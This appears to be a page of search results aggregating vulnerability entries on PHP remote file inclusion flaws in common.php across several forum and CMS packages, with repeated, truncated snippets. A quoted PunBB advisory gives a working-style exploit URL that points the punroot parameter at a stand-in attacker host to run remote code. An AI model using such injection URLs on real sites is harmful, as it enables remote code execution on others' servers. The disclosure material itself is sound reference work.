CVE-2006-1203

PHP remote file include vulnerability in common.php in txtForum 1.0.4-dev and earlier allows remote attackers to include and execute arbitrary PHP code via a URL in the skin parameter to login.php, and possibly other parameters to other PHP scripts, related to include statements in common.php...

CVE-2006-1203

The CVE-2006-1203 entry concerns a PHP remote file include vulnerability in txtForum 1.0.4-dev and earlier. The issue allows an attacker to cause arbitrary PHP code execution via a URL passed to the skin parameter of login.php (and possibly other parameters) due to include statements in common.ph...

CVE-2006-1203

PHP remote file include vulnerability in common.php in txtForum 1.0.4-dev and earlier allows remote attackers to include and execute arbitrary PHP code via a URL in the skin parameter to login.php, and possibly other parameters to other PHP scripts, related to include statements in common.php...

Remote file inclusion

PHP remote file inclusion vulnerability in common.php in Intensive Point iUser Ecommerce allows remote attackers to include arbitrary files via a URL in the includepath variable, which is not initialized before being used...

CVE-2006-0824

Multiple unspecified vulnerabilities in lib-common.php in Geeklog 1.4.0 before 1.4.0sr1 and 1.3.11 before 1.3.11sr4 allow remote attackers to include arbitrary local files and execute arbitrary code via 1 absolute paths in unspecified parameters and 2 the language cookie, as demonstrated for code...

CVE-2006-0824

CVE-2006-0824 affects Geeklog: lib-common.php in Geeklog 1.4.0 before 1.4.0sr1 and 1.3.11 before 1.3.11sr4 allows remote attackers to include arbitrary local files and execute code via absolute paths in unspecified parameters and via the language cookie (demonstrated for code execution using erro...

CVE-2005-3328

CVE-2005-3328 relates to a PHP remote file inclusion in PunBB, specifically in common.php where the pun_root parameter enables an attacker to execute arbitrary code. Affected software: PunBB 1.1.2 through 1.1.5. Underlying issue: remote code execution via user-supplied pun_root. Impact per the en...

punbb-1.1.2.txt

Remote File Inclusion in forum PunBB Date:24/10/2005 Severity: High version: 1.1.2 1.1.5 The bug reside in common.php Exploit : http://www.host.com/forum/include/common.php?punroot=http://www.hostevil.com/cmd?&=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com FREE pop-up blocking with the...

Remote File Inclusion in forum PunBB

Remote File Inclusion in forum PunBB Date:24/10/2005 Severity: High version: 1.1.2 1.1.5 The bug reside in common.php Exploit : http://www.host.com/forum/include/common.php?punroot=http://www.hostevil.com/cmd?&=id Discovery by RoDheDoR L-G-H Team http://www.lezr.com FREE pop-up blocking with the...

CVE-2005-1681

CVE-2005-1681 affects phpATM 1.21 (and possibly earlier) where a PHP remote file inclusion flaw in common.php allows an attacker to execute arbitrary PHP code via a URL in the include_location parameter to index.php. The vulnerability (root cause: include_location-driven RFI in index.php) enables...

Nucleus CMS 3.0 Blog:CMS 3 PunBB 1.x - Common.php Remote File Inclusion

Nucleus CMS 3.0 Blog:CMS 3 PunBB 1.x - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/10760/info Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be...

Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/10760/info Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. Input passed to the 'common.php'...